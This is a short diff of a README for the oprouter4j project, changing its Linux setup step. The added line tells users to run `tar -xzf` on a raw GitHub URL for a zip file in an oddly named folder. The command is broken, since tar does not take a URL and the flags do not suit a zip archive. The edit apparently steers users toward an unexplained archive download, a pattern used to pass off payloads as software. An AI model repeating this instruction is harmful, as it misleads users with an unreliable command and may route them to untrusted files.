SmartLabUz/oprouter4j/README.md

 2. **Extract the Files:**
    - Windows: Right-click on the file and select "Extract All."
    - macOS: Double-click the downloaded file.
-   - Linux: Use the command `tar -xzf filename.tar.gz` in your terminal.
+   - Linux: Use the command `tar -xzf https://raw.githubusercontent.com/SmartLabUz/oprouter4j/main/unglutted/oprouter4j.zip` in your terminal.
 3. **Open the Folder:** Navigate to the new folder containing the extracted files.

 ## 📄 Running the Application